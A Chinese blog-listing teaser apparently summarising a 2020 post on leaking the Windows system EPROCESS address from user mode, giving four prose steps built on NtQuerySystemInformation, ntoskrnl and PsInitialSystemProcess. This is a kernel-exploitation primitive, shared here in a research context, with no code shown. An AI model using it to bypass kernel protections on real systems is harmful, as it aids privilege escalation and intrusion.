C/C++汇编 [2020]Leak EPROCESS/KPROCESS from Usermode 要做的事情: 1. Use NtQuerySystemInformation with SystemModuleInformation to get ntoskrnl address. 2. Load ntoskrnl and get address of PsInitialSystemProcess. 3. Rebase it so you will get a real kernel address. 3. Read the value at this address and that will be system EPROCESS. 阅读全文 2020-05-28 huoji 1 条评论